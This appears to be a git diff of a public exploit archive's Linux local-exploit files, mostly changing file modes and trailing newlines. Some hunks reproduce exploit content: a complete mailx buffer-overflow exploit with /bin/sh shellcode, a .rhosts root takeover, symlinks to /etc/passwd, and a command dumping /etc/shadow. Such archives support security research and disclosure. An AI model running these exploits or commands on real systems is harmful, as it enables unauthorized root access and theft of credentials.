a/platforms/linux/local/19602.c b/platforms/linux/local/19602.c old mode 100755 new mode 100644 index 49b860d6d..e7dfba891 --- a/platforms/linux/local/19602.c +++ b/platforms/linux/local/19602.c @@ -64,4 +64,4 @@ victim$ killall -HUP sendmail victim$telnet localhost 25 220 Takeover ESMTP mail service - road closed. -victim$ \ No newline at end of file +victim$ \ No newline at end of file diff --git a/platforms/linux/local/19655.txt b/platforms/linux/local/19655.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/19676.c b/platforms/linux/local/19676.c old mode 100755 new mode 100644 similarity index 100% rename from platforms/freebsd/local/19676.c rename to platforms/linux/local/19676.c diff --git a/platforms/linux/local/19677.c b/platforms/linux/local/19677.c old mode 100755 new mode 100644 index fd70690ab..68bb46a08 --- a/platforms/linux/local/19677.c +++ b/platforms/linux/local/19677.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. @@ -5,6 +6,7 @@ Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string. The user does not have to have a valid $DISPLAY to exploit this. +*/ /*Larry W. Cashdollar linux xsolider exploit. *lwc@vapid.dhs.org http://vapid.dhs.org diff --git a/platforms/linux/local/19693.txt b/platforms/linux/local/19693.txt old mode 100755 new mode 100644 index 819c924cb..e3513416e --- a/platforms/linux/local/19693.txt +++ b/platforms/linux/local/19693.txt @@ -274,4 +274,4 @@ bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys ssh-rsa rogueclown washere bukkit:/home/adalia/security/pythonwrapper # ls __pycache__ ls: cannot access __pycache__: No such file or directory -bukkit:/home/adalia/security/pythonwrapper # \ No newline at end of file +bukkit:/home/adalia/security/pythonwrapper # \ No newline at end of file diff --git a/platforms/linux/local/19698.txt b/platforms/linux/local/19698.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19699.txt b/platforms/linux/local/19699.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19700.c b/platforms/linux/local/19700.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19710.c b/platforms/linux/local/19710.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19723.txt b/platforms/linux/local/19723.txt old mode 100755 new mode 100644 index db937d122..9a0ab82d1 --- a/platforms/linux/local/19723.txt +++ b/platforms/linux/local/19723.txt @@ -31,4 +31,4 @@ CorelLinux:~# exit exit /usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872 CorelLinux:~# id -uid=0(root) gid=1001(tascon) groups=1001(tascon) \ No newline at end of file +uid=0(root) gid=1001(tascon) groups=1001(tascon) \ No newline at end of file diff --git a/platforms/linux/local/19727.c b/platforms/linux/local/19727.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19735.txt b/platforms/linux/local/19735.txt old mode 100755 new mode 100644 index ff2f0d2ff..3ba31a2c3 --- a/platforms/linux/local/19735.txt +++ b/platforms/linux/local/19735.txt @@ -8,4 +8,4 @@ apcd is used to monitor information from APC uninterruptable power supplies. The ln -sf /tmp/upsstat /.rhosts (wait for SIGUSR1 to be sent) echo + + >> /.rhosts -rsh localhost -l root \ No newline at end of file +rsh localhost -l root \ No newline at end of file diff --git a/platforms/linux/local/19762.c b/platforms/linux/local/19762.c old mode 100755 new mode 100644 index 62ac73c63..d9f6c2bf0 --- a/platforms/linux/local/19762.c +++ b/platforms/linux/local/19762.c @@ -135,4 +135,4 @@ int main(int ac, char **av){ fclose(outlist); return(1); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19763.txt b/platforms/linux/local/19763.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19764.txt b/platforms/linux/local/19764.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19765.txt b/platforms/linux/local/19765.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19778.c b/platforms/linux/local/19778.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19779.c b/platforms/linux/local/19779.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19787.txt b/platforms/linux/local/19787.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19794.txt b/platforms/linux/local/19794.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19802.c b/platforms/linux/local/19802.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19803.txt b/platforms/linux/local/19803.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19811.c b/platforms/linux/local/19811.c old mode 100755 new mode 100644 index f79c6cc0f..1322f7641 --- a/platforms/linux/local/19811.c +++ b/platforms/linux/local/19811.c @@ -36,4 +36,4 @@ int main(int argc, char *argv[]) setenv("DISPLAY", "DUPA", 1); setenv("HOME", buf, 1); execl(PATH, PATH, 0); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19812.c b/platforms/linux/local/19812.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19813.txt b/platforms/linux/local/19813.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19816.txt b/platforms/linux/local/19816.txt old mode 100755 new mode 100644 index a2ddae7ee..a645b965a --- a/platforms/linux/local/19816.txt +++ b/platforms/linux/local/19816.txt @@ -12,4 +12,4 @@ name "create a setgid shell" } click control-left mouse button, and click "setgid shell" -execute /tmp/sh \ No newline at end of file +execute /tmp/sh \ No newline at end of file diff --git a/platforms/linux/local/19837.c b/platforms/linux/local/19837.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19838.c b/platforms/linux/local/19838.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19867.txt b/platforms/linux/local/19867.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19883.c b/platforms/linux/local/19883.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19900.c b/platforms/linux/local/19900.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19915.txt b/platforms/linux/local/19915.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19925.c b/platforms/linux/local/19925.c old mode 100755 new mode 100644 index 2911d27d7..2d5b82323 --- a/platforms/linux/local/19925.c +++ b/platforms/linux/local/19925.c @@ -50,4 +50,4 @@ int main(int argc, char *argv[]) b[RET_OFFSET+4]=0; execlp("ksu","ksu","-n",b,NULL); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19946.txt b/platforms/linux/local/19946.txt old mode 100755 new mode 100644 index 3f2630d2c..ab5383b95 --- a/platforms/linux/local/19946.txt +++ b/platforms/linux/local/19946.txt @@ -7,4 +7,4 @@ This vulnerability will also affect any Unix system with OpenLDAP assuming the f 2) /usr/tmp is a world writable directory. 3) slurpd was built with the DEFAULT_SLURPD_REPLICA_DIR set to /usr/tmp -ln -sf /etc/passwd /usr/tmp/NEXTID \ No newline at end of file +ln -sf /etc/passwd /usr/tmp/NEXTID \ No newline at end of file diff --git a/platforms/linux/local/19952.c b/platforms/linux/local/19952.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19953.c b/platforms/linux/local/19953.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19954.c b/platforms/linux/local/19954.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19955.c b/platforms/linux/local/19955.c old mode 100755 new mode 100644 index 6ea3dc581..c3202fb2f --- a/platforms/linux/local/19955.c +++ b/platforms/linux/local/19955.c @@ -46,4 +46,4 @@ int main(int argc, char *argv[]) printf("@test\r\n"); printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19969.c b/platforms/linux/local/19969.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19970.c b/platforms/linux/local/19970.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19979.pl b/platforms/linux/local/19979.pl index 8b689ded6..1d02946cc 100755 --- a/platforms/linux/local/19979.pl +++ b/platforms/linux/local/19979.pl @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/1291/info - -The KDE configuration-file management has a bug which could result in root compromise. - -Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs. - -Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges. +#source: http://www.securityfocus.com/bid/1291/info +# +#The KDE configuration-file management has a bug which could result in root compromise. +# +#Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs. +# +#Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges. #!/usr/bin/perl diff --git a/platforms/linux/local/19980.pl b/platforms/linux/local/19980.pl index f8a6e6eeb..0e7f0c348 100755 --- a/platforms/linux/local/19980.pl +++ b/platforms/linux/local/19980.pl @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/1291/info - -The KDE configuration-file management has a bug which could result in root compromise. - -Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs. - -Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges. +#source: http://www.securityfocus.com/bid/1291/info +# +#The KDE configuration-file management has a bug which could result in root compromise. +# +#Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs. +# +#Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges. #!/usr/bin/perl diff --git a/platforms/linux/local/19981.sh b/platforms/linux/local/19981.sh index c6d8b8235..0bfc8e03f 100755 --- a/platforms/linux/local/19981.sh +++ b/platforms/linux/local/19981.sh @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/1291/info - -The KDE configuration-file management has a bug which could result in root compromise. - -Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs. - -Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges. +#source: http://www.securityfocus.com/bid/1291/info +# +#The KDE configuration-file management has a bug which could result in root compromise. +# +#Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs. +# +#Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges. #!/bin/bash diff --git a/platforms/linux/local/19991.c b/platforms/linux/local/19991.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19992.c b/platforms/linux/local/19992.c old mode 100755 new mode 100644 index 5fd763f9f..2261dedea --- a/platforms/linux/local/19992.c +++ b/platforms/linux/local/19992.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/1305/info Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail). @@ -5,54 +6,54 @@ Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can b A vulnerability exists in the 'mail' program, part of the Berkeley mailx package. The 'mail' program contains a buffer overflow condition that is present when the -c parameter is used at the command line. On systems where it is installed setgid, this vulnerability can be exploited to gain group 'mail' privileges. +*/ - /* - * ..just couse it is no longer secret :> - * - * mailx sploit (linux x86) - * funkySh 3/07/99 - * tested under Slackware 3.6,4.0,7.0 offset = 0-500 - * Debian 2.0r2,2.1,2.2 offset = -7000 ..ugh ;] - * - * buffer overrun in cc-addr option, gives "mail" group privileges - * (if mailx is installed setgid mail). - * Remember to define GID - it is different on Slack/Debian - * - */ - - #include <stdio.h> - - #define GID "\x08" // Debian - //#define GID "\x0c" // Slackware - - char code[] = "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31" - "\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3"GID"\xb1" - GID"\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76" - "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" - "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" - "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; - /* setregid + generic shell code */ - - #define BUFFER 10000 - #define NOP 0x90 - #define PATH "/usr/bin/Mail" - - char buf[BUFFER]; - - unsigned long getesp(void) { - __asm__("movl %esp,%eax"); - } - int main(int argc, char * argv[]) - { - int i, offset = 0; - long address; - if(argc > 1) offset = atoi(argv[1]); - address = getesp() -11000 + offset; - memset(buf,NOP,BUFFER); - memcpy(buf+800,code,strlen(code)); - for(i=876;i<BUFFER-2;i+=4) - *(int *)&buf[i]=address; - fprintf (stderr, "Hit '.' to get shell..\n"); - execl(PATH, PATH, "x","-s","x","-c", buf,0); - } - \ No newline at end of file +/* + * ..just couse it is no longer secret :> + * + * mailx sploit (linux x86) + * funkySh 3/07/99 + * tested under Slackware 3.6,4.0,7.0 offset = 0-500 + * Debian 2.0r2,2.1,2.2 offset = -7000 ..ugh ;] + * + * buffer overrun in cc-addr option, gives "mail" group privileges + * (if mailx is installed setgid mail). + * Remember to define GID - it is different on Slack/Debian + * + */ + +#include <stdio.h> + +#define GID "\x08" // Debian +//#define GID "\x0c" // Slackware + +char code[] = "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31" + "\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3"GID"\xb1" + GID"\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76" + "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" + "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" + "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; + /* setregid + generic shell code */ + +#define BUFFER 10000 +#define NOP 0x90 +#define PATH "/usr/bin/Mail" + +char buf[BUFFER]; + +unsigned long getesp(void) { + __asm__("movl %esp,%eax"); + } +int main(int argc, char * argv[]) +{ + int i, offset = 0; + long address; + if(argc > 1) offset = atoi(argv[1]); + address = getesp() -11000 + offset; + memset(buf,NOP,BUFFER); + memcpy(buf+800,code,strlen(code)); + for(i=876;i<BUFFER-2;i+=4) + *(int *)&buf[i]=address; + fprintf (stderr, "Hit '.' to get shell..\n"); + execl(PATH, PATH, "x","-s","x","-c", buf,0); +} \ No newline at end of file diff --git a/platforms/linux/local/20000.c b/platforms/linux/local/20000.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20004.c b/platforms/linux/local/20004.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20013.c b/platforms/linux/local/20013.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20021.txt b/platforms/linux/local/20021.txt old mode 100755 new mode 100644 index 7c51baacd..3b915ae2c --- a/platforms/linux/local/20021.txt +++ b/platforms/linux/local/20021.txt @@ -13,4 +13,4 @@ Password changes submitted to Red Hat Piranha via HTTP are insecurely passed as 127.0.0.1 - piranha [19/May/2000:20:58:50 +0200] "GET /piranha/secure/passwd.php3?try1=arkth&try2=arkth&passwd=ACCEPT HTTP/1.0" 200 3120 -... \ No newline at end of file +... \ No newline at end of file diff --git a/platforms/linux/local/20024.c b/platforms/linux/local/20024.c old mode 100755 new mode 100644 index f627f1422..20a682167 --- a/platforms/linux/local/20024.c +++ b/platforms/linux/local/20024.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/1371/info KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf <file to be read> +*/ /* Exploit code for /usr/bin/fld diff --git a/platforms/linux/local/2004.c b/platforms/linux/local/2004.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20045.c b/platforms/linux/local/20045.c old mode 100755 new mode 100644 index cccc736e1..c70cdbd6a --- a/platforms/linux/local/20045.c +++ b/platforms/linux/local/20045.c @@ -174,4 +174,4 @@ main(int argc, const char* argv[]) write(accept_fd, sendbuf, 32); while(1); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/2005.c b/platforms/linux/local/2005.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/2006.c b/platforms/linux/local/2006.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20093.c b/platforms/linux/local/20093.c old mode 100755 new mode 100644 index 532ae3475..114aa4cf4 --- a/platforms/linux/local/20093.c +++ b/platforms/linux/local/20093.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/1495/info Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the USER environment variables. The Redhat Linux Xconq package installs the game with SGID 'games' privileges allowing an attacker to compromise the local 'games' group. +*/ /* (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]. this diff --git a/platforms/linux/local/2013.c b/platforms/linux/local/2013.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20155.txt b/platforms/linux/local/20155.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20160.txt b/platforms/linux/local/20160.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20185.c b/platforms/linux/local/20185.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20201.c b/platforms/linux/local/20201.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20250.c b/platforms/linux/local/20250.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20251.c b/platforms/linux/local/20251.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20252.c b/platforms/linux/local/20252.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20285.c b/platforms/linux/local/20285.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/2031.c b/platforms/linux/local/2031.c old mode 100755 new mode 100644 index 3b5f4d13a..781806c67 --- a/platforms/linux/local/2031.c +++ b/platforms/linux/local/2031.c @@ -105,5 +105,4 @@ int main(void) exit(0); } -// milw0rm.com [2006-07-18] - \ No newline at end of file +// milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/platforms/linux/local/20312.c b/platforms/linux/local/20312.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20316.txt b/platforms/linux/local/20316.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20338.c b/platforms/linux/local/20338.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20411.c b/platforms/linux/local/20411.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20458.txt b/platforms/linux/local/20458.txt old mode 100755 new mode 100644 index b2336e2e8..69e6e21c9 --- a/platforms/linux/local/20458.txt +++ b/platforms/linux/local/20458.txt @@ -30,4 +30,4 @@ $ strace testfile SYS_197(0x3, 0xbffff650, 0x40197d40, 0x80cca38, 0x3) = -1 ENOSYS (Function not implemented) fstat(3, {st_mode=S_IFREG|0644, st_size=1744, ...}) = 0 mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 -.. \ No newline at end of file +.. \ No newline at end of file diff --git a/platforms/linux/local/20517.c b/platforms/linux/local/20517.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20556.c b/platforms/linux/local/20556.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20581.c b/platforms/linux/local/20581.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/206.c b/platforms/linux/local/206.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20626.c b/platforms/linux/local/20626.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20645.c b/platforms/linux/local/20645.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20691.txt b/platforms/linux/local/20691.txt old mode 100755 new mode 100644 index eb0b7e313..942993a95 --- a/platforms/linux/local/20691.txt +++ b/platforms/linux/local/20691.txt @@ -4,4 +4,4 @@ FTPFS is a Linux kernel module allowing users to mount remote files from any sta A version of FTPFS is vulnerable to a buffer overflow leading to a denial of service, and potentially execution of arbitrary code. This overflow can be exploited by any local user with access to the mount command on a system with FTPFS installed. -mount -t ftpfs none /mnt -o ip=127.0.0.1,user=xxxxxxxxxxxxxxxxxxxxxxxxxxxx... \ No newline at end of file +mount -t ftpfs none /mnt -o ip=127.0.0.1,user=xxxxxxxxxxxxxxxxxxxxxxxxxxxx... \ No newline at end of file diff --git a/platforms/linux/local/20720.c b/platforms/linux/local/20720.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20721.c b/platforms/linux/local/20721.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20776.c b/platforms/linux/local/20776.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20777.c b/platforms/linux/local/20777.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20781.txt b/platforms/linux/local/20781.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20843.txt b/platforms/linux/local/20843.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20867.txt b/platforms/linux/local/20867.txt old mode 100755 new mode 100644 index f3b4bb9e1..167f62c59 --- a/platforms/linux/local/20867.txt +++ b/platforms/linux/local/20867.txt @@ -21,4 +21,4 @@ ARCserveIT Universal Agent started... Then, je@boxname~> ls -la /etc/passwd --r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd \ No newline at end of file +-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd \ No newline at end of file diff --git a/platforms/linux/local/20868.txt b/platforms/linux/local/20868.txt old mode 100755 new mode 100644 index 594bcac66..4a3505895 --- a/platforms/linux/local/20868.txt +++ b/platforms/linux/local/20868.txt @@ -16,4 +16,4 @@ Then, je@boxname~> cat /etc/passwd asagentd 6051/tcp # ARCserve agent -asagentd 6051/udp # ARCserve agent \ No newline at end of file +asagentd 6051/udp # ARCserve agent \ No newline at end of file diff --git a/platforms/linux/local/209.c b/platforms/linux/local/209.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20900.txt b/platforms/linux/local/20900.txt old mode 100755 new mode 100644 index 3debb8a26..d508ddddf --- a/platforms/linux/local/20900.txt +++ b/platforms/linux/local/20900.txt @@ -19,4 +19,4 @@ From:@@%p%p%p%p%p%p%p%p%p%p Somewhere in the answers you should see: 550 Syntax error in 'From' header: domain missing or malformed: failing address is: -@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40 \ No newline at end of file +@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40 \ No newline at end of file diff --git a/platforms/linux/local/20901.c b/platforms/linux/local/20901.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20926.txt b/platforms/linux/local/20926.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20927.c b/platforms/linux/local/20927.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20967.c b/platforms/linux/local/20967.c old mode 100755 new mode 100644 index 90d766fe6..447a0c2bb --- a/platforms/linux/local/20967.c +++ b/platforms/linux/local/20967.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2927/info Vim is an enhanced version of the popular text editor vi. @@ -5,6 +6,7 @@ Vim is an enhanced version of the popular text editor vi. A race condition vulnerability exists in the swap file mechanism used by the 'vim' program. The error occurs when a swap file name for a file being opened is symbolically linked to a non-existent file. By conjecturing the name of a file to be edited by another user, it may be possible for a local user to create a malicious symbolic link to a non-existent file. This could cause the new target file to be created with the permissions of the user running vim. +*/ /******************************************************************* Crontab tmp file race condition diff --git a/platforms/linux/local/20979.c b/platforms/linux/local/20979.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20986.c b/platforms/linux/local/20986.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20988.c b/platforms/linux/local/20988.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/20990.c b/platforms/linux/local/20990.c old mode 100755 new mode 100644 index 16f8d8bda..4863b9076 --- a/platforms/linux/local/20990.c +++ b/platforms/linux/local/20990.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2974/info teTeX is a TeX distribution for UNIX compatible systems. @@ -5,6 +6,7 @@ teTeX is a TeX distribution for UNIX compatible systems. A race condition vulnerability exists in the temporary file handling method used by some teTeX filters. The problem exists because in some cases temporary files are created world-writeable with a predictable filename based on the process ID of the filter. If an attacker is able to determine the name of a temporary file used during the program's operation, a symbolic link could be created pointing to a file writeable by the user running the filter. When the filters are used by an application that runs with elevated privileges such as LPRng, the potential impact of the attack could become more significant. A local attacker could exploit this vulnerability to cause LPRng to execute arbitrary commands with its elevated privileges. +*/ /******************************************************************** Redhat 7.0 (mebe 7.1 ?) diff --git a/platforms/linux/local/20992.c b/platforms/linux/local/20992.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21.c b/platforms/linux/local/21.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21014.c b/platforms/linux/local/21014.c old mode 100755 new mode 100644 index 914cd3704..81dc3a703 --- a/platforms/linux/local/21014.c +++ b/platforms/linux/local/21014.c @@ -39,4 +39,4 @@ chmod("/tmp/bleh", perm); } execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/21043.c b/platforms/linux/local/21043.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21060.c b/platforms/linux/local/21060.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21061.c b/platforms/linux/local/21061.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21062.txt b/platforms/linux/local/21062.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21063.txt b/platforms/linux/local/21063.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21124.txt b/platforms/linux/local/21124.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21158.c b/platforms/linux/local/21158.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21159.c b/platforms/linux/local/21159.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21226.c b/platforms/linux/local/21226.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21229.txt b/platforms/linux/local/21229.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21231.c b/platforms/linux/local/21231.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21247.c b/platforms/linux/local/21247.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21248.txt b/platforms/linux/local/21248.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21258.bat b/platforms/linux/local/21258.bat old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21259.java b/platforms/linux/local/21259.java old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21280.c b/platforms/linux/local/21280.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21281.c b/platforms/linux/local/21281.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21302.c b/platforms/linux/local/21302.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21323.c b/platforms/linux/local/21323.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21341.c b/platforms/linux/local/21341.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21342.c b/platforms/linux/local/21342.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21348.txt b/platforms/linux/local/21348.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21353.c b/platforms/linux/local/21353.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21362.c b/platforms/linux/local/21362.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21375.txt b/platforms/linux/local/21375.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21398.txt b/platforms/linux/local/21398.txt old mode 100755 new mode 100644 index 052973cfa..3583760db --- a/platforms/linux/local/21398.txt +++ b/platforms/linux/local/21398.txt @@ -6,4 +6,4 @@ It has been reported that it is possible for a remote user to upload files to wo After uploading 'malicious' to /tmp: -ssh -l user host '/tmp/malicious' \ No newline at end of file +ssh -l user host '/tmp/malicious' \ No newline at end of file diff --git a/platforms/linux/local/21420.c b/platforms/linux/local/21420.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21458.txt b/platforms/linux/local/21458.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21496.c b/platforms/linux/local/21496.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21499.txt b/platforms/linux/local/21499.txt old mode 100755 new mode 100644 index 8d27dbe36..af6e60fde --- a/platforms/linux/local/21499.txt +++ b/platforms/linux/local/21499.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/4901/info The QNX RTOS crttrap binary includes a command-line option for specifying a configuration file. crttrap is installed setuid by default. crttrap Local attackers may specify an arbitrary system file in place of the configuration file and crttrap will disclose the contents of the arbitrary file. -crttrap -c /etc/shadow \ No newline at end of file +crttrap -c /etc/shadow \ No newline at end of file diff --git a/platforms/linux/local/215.c b/platforms/linux/local/215.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21500.txt b/platforms/linux/local/21500.txt old mode 100755 new mode 100644 index 4383d5f3d..8d03a986b --- a/platforms/linux/local/21500.txt +++ b/platforms/linux/local/21500.txt @@ -4,4 +4,4 @@ The QNX RTOS monitor utility is prone to an issue which may allow local attacker 